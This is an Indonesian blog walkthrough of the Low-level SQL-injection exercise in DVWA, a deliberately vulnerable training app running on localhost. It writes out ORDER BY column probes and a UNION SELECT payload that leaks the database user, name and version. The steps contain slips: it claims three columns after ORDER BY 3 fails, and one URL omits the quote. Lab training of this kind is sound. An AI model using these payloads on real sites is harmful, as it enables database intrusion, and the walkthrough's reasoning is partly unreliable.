DVWA - SQL-Injection Level : Low

Halo exploiter, kali ini sy akan memberi tahu cara solved SQL-Injection di DVWA Level : Low, ada yg belum tau apa itu DVWA ? Klik Ini : APA ITU DVWA ? DAN BAGAIMANA CARA MENGINSTALNYA PADA LOCAL WEB SERVER

langsung kalian akses DVWA nya, sebelumnya setting dlu security nya ke level Low

 kalau sudah klik menu SQL-Injection

1. disini saya mencoba memasukkan angka 1 di bagian user ID
dan muncul output sperti ini


2. dan kita cba tambahkan single quote ' jdinya 1'
dan muncul error



3. disini kita langsung saja melakukan order+by+ sampai ketemu angka errornya
http://localhost:8080/DVWA/vulnerabilities/sqli/?id=1'+order+by+1--+-&Submit=Submit# -> Normal
http://localhost:8080/DVWA/vulnerabilities/sqli/?id=1'+order+by+2--+-&Submit=Submit# -> Normal
http://localhost:8080/DVWA/vulnerabilities/sqli/?id=1'+order+by+3--+-&Submit=Submit# -> Error

4. berarti hanya ada 3 kolum, langsung saja http://localhost:8080/DVWA/vulnerabilities/sqli/?id=-1+union+select+1,2--+-


5. angka ajaibnya 1&2, mari kita test angkanya

6. http://localhost:8080/DVWA/vulnerabilities/sqli/?id=-1%27+union+select+("Injected%20By%20No_iDeNtiTy"),ConCAt(user(),%27::%27,database(),%27::%27,version(),%27::%27,sysdate())--+-&Submit=Submit#


7. berhasil di inject :)

Ok Sekian Dari Sy Semoga Bermanfaat
LihatTutupKomentar
loading...